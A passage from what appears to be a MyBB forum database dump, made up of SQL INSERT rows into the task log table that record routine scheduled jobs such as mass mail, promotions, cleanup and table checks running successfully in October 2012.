ran.'); INSERT INTO mybb_tasklog VALUES('12444', '9', '1351060268', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12445', '3', '1351060309', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12446', '9', '1351060895', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12447', '5', '1351061172', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12448', '9', '1351061800', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12449', '3', '1351061943', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12450', '1', '1351062042', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12451', '7', '1351062047', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12452', '5', '1351062331', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12453', '9', '1351062960', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12454', '5', '1351063967', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12455', '9', '1351064118', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12456', '3', '1351064127', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12457', '9', '1351064545', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12458', '5', '1351064708', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12459', '9', '1351065452', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12460', '3', '1351065562', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12461', '1', '1351065632', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12462', '7', '1351065641', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12463', '5', '1351065934', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12464', '9', '1351066221', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12465', '5', '1351067435', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12466', '9', '1351067450', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12467', '3', '1351067483', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12468', '9', '1351068098', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12469', '5', '1351069300', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12470', '9', '1351069388', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12471', '3', '1351069394', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12472', '1', '1351069401', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12473', '7', '1351069405', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12474', '5', '1351070818', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12475', '9', '1351071761', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12476', '3', '1351072016', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12477', '5', '1351074382', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12478', '9', '1351074408', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12479', '3', '1351076374', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12480', '1', '1351076379', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12481', '7', '1351077006', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12482', '9', '1351077738', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12483', '5', '1351077761', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12484', '1', '1351077935', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12485', '5', '1351077947', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12486', '9', '1351078297', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12487', '3', '1351078315', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12488', '9', '1351079217', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12489', '5', '1351079223', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12490', '9', '1351079713', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12491', '3', '1351080110', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12492', '1', '1351080116', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12493', '4', '1351080185', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12494', '7', '1351080522', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12495', '5', '1351080533', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12496', '9', '1351083720', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12497', '5', '1351083728', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12498', '3', '1351083869', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12499', '1', '1351089365', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12500', '7', '1351089391', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12501', '5', '1351089451', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12502', '9', '1351089528', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12503', '3', '1351089539', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12504', '9', '1351089691', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12505', '5', '1351090274', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12506', '9', '1351090701', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12507', '3', '1351090753', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12508', '1', '1351090999', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12509', '7', '1351091007', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12510', '5', '1351091119', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12511', '9', '1351091442', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12512', '5', '1351092364', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12513', '9', '1351092488', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12514', '3', '1351092649', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12515', '9', '1351093233', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12516', '5', '1351093524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12517', '9', '1351094214', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12518', '3', '1351094402', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12519', '1', '1351094478', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12520', '7', '1351094479', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12521', '5', '1351094711', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12522', '9', '1351096298', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12523', '5', '1351096539', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12524', '3', '1351096612', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12525', '9', '1351097063', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12526', '5', '1351097198', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12527', '9', '1351097853', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12528', '3', '1351099132', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12529', '1', '1351099163', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12530', '7', '1351099168', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12531', '5', '1351099195', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12532', '9', '1351099266', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12533', '5', '1351099677', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12534', '9', '1351100581', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12535', '3', '1351102360', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12536', '5', '1351102412', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12537', '9', '1351102430', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12538', '1', '1351102610', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12539', '7', '1351103677', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12540', '5', '1351103683', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12541', '9', '1351104510', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12542', '3', '1351105075', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12543', '5', '1351105084', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12544', '9', '1351105123', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12545', '3', '1351105143', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12546', '1', '1351105484', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12547', '7', '1351105486', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12548', '5', '1351105503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12549', '9', '1351105938', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12550', '5', '1351107039', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12551', '9', '1351107239', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12552', '3', '1351107242', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12553', '9', '1351107711', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12554', '5', '1351107972', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12555', '9', '1351108541', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12556', '3', '1351108911', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12557', '1', '1351109001', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12558', '7', '1351109031', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12559', '5', '1351109148', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12560', '9', '1351109553', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12561', '5', '1351110599', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12562', '9', '1351110707', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12563', '3', '1351110711', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12564', '9', '1351111220', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12565', '5', '1351111773', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12566', '9', '1351112263', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12567', '3', '1351112343', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12568', '1', '1351112678', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12569', '7', '1351112690', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12570', '5', '1351112706', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12571', '9', '1351113042', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12572', '5', '1351114935', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12573', '9', '1351114982', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12574', '3', '1351114985', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12575', '5', '1351115348', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12576', '9', '1351118016', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12577', '3', '1351118021', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12578', '1', '1351118024', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12579', '7', '1351118027', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12580', '5', '1351118032', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12581', '9', '1351118437', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12582', '5', '1351118999', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12583', '9', '1351119318', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12584', '3', '1351119614', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12585', '1', '1351119623', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12586', '7', '1351119792', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12587', '5', '1351120787', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12588', '9', '1351120807', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12589', '5', '1351121211', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12590', '9', '1351121219', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12591', '3', '1351121579', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12592', '9', '1351125004', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12593', '5', '1351125016', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12594', '3', '1351125020', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12595', '1', '1351125023', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12596', '2', '1351125036', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12597', '7', '1351125041', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12598', '11', '1351125045', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12599', '9', '1351125853', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12600', '5', '1351127812', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12601', '9', '1351127825', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12602', '3', '1351127836', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12603', '1', '1351128555', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12604', '7', '1351129504', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12605', '5', '1351129596', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12606', '9', '1351129622', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12607', '3', '1351129963', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12608', '9', '1351130132', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12609', '3', '1351130369', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12610', '1', '1351130411', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12611', '7', '1351130417', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12612', '5', '1351130745', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12613', '9', '1351131129', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12614', '5', '1351131978', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12615', '9', '1351132061', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12616', '3', '1351132266', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12617', '9', '1351132870', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12618', '5', '1351133138', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12619', '9', '1351133760', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12620', '3', '1351133962', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12621', '1', '1351134032', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12622', '7', '1351134048', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12623', '5', '1351134440', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12624', '9', '1351134668', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12625', '5', '1351135612', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12626', '9', '1351135744', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12627', '3', '1351135957', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12628', '9', '1351136469', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12629', '5', '1351136754', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12630', '9', '1351137467', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12631', '3', '1351137553', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12632', '1', '1351137602', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12633', '7', '1351137619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12634', '5', '1351137931', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12635', '9', '1351138229', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12636', '5', '1351140759', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12637', '9', '1351140905', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12638', '3', '1351140937', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12639', '3', '1351142875', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12640', '1', '1351142926', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12641', '7', '1351142937', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12642', '5', '1351143009', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12643', '9', '1351143015', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12644', '3', '1351143124', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12645', '9', '1351143619', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12646', '5', '1351143932', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12647', '9', '1351149810', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12648', '3', '1351149817', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12649', '1', '1351151119', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12650', '7', '1351151123', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12651', '5', '1351151125', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12652', '9', '1351151148', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12653', '3', '1351151214', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12654', '9', '1351152073', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12655', '3', '1351152194', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12656', '1', '1351152201', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12657', '7', '1351152203', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12658', '5', '1351152356', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12659', '9', '1351152643', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12660', '5', '1351153725', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12661', '9', '1351153937', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12662', '3', '1351154597', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12663', '9', '1351154625', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12664', '5', '1351154705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12665', '9', '1351155559', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12666', '3', '1351155589', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12667', '1', '1351155604', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12668', '7', '1351155612', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12669', '5', '1351155958', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12670', '9', '1351156258', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12671', '5', '1351157150', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12672', '9', '1351157161', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12673', '3', '1351157413', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12674', '9', '1351158065', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12675', '5', '1351158315', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12676', '9', '1351158997', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12677', '3', '1351159142', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12678', '1', '1351159228', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12679', '7', '1351159231', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12680', '5', '1351159544', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12681', '9', '1351159858', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12682', '5', '1351160883', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12683', '9', '1351160894', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12684', '3', '1351161173', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12685', '9', '1351162355', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12686', '5', '1351162361', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12687', '9', '1351163673', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12688', '3', '1351163680', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12689', '1', '1351164384', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12690', '7', '1351164388', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12691', '5', '1351164393', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12692', '9', '1351165383', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12693', '3', '1351165398', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12694', '5', '1351165520', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12695', '9', '1351166187', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12696', '3', '1351166353', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12697', '1', '1351166470', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12698', '4', '1351166477', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12699', '7', '1351166487', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12700', '5', '1351166749', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12701', '9', '1351167018', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12702', '5', '1351167994', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12703', '9', '1351168011', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12704', '3', '1351168693', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12705', '9', '1351169009', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12706', '5', '1351169129', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12707', '9', '1351170533', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12708', '3', '1351170541', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12709', '1', '1351170547', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12710', '7', '1351170557', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12711', '5', '1351170603', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12712', '9', '1351170982', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12713', '5', '1351171587', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12714', '9', '1351171631', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12715', '3', '1351172421', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12716', '9', '1351173733', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12717', '5', '1351173740', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12718', '3', '1351173761', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12719', '1', '1351173809', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12720', '7', '1351173816', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12721', '5', '1351173905', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12722', '9', '1351175450', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12723', '5', '1351175473', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12724', '3', '1351175507', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12725', '9', '1351176142', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12726', '5', '1351176646', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12727', '9', '1351176955', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12728', '3', '1351177762', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12729', '1', '1351178098', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12730', '7', '1351178101', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12731', '5', '1351178133', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12732', '9', '1351178142', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12733', '5', '1351178898', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12734', '9', '1351178938', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12735', '3', '1351179036', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12736', '9', '1351180246', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12737', '5', '1351182442', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12738', '9', '1351182468', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12739', '3', '1351182473', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12740', '1', '1351183259', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12741', '7', '1351183273', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12742', '3', '1351183290', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12743', '9', '1351183300', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12744', '5', '1351184034', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12745', '9', '1351184101', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12746', '3', '1351185268', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12747', '1', '1351185278', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12748', '7', '1351186582', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog 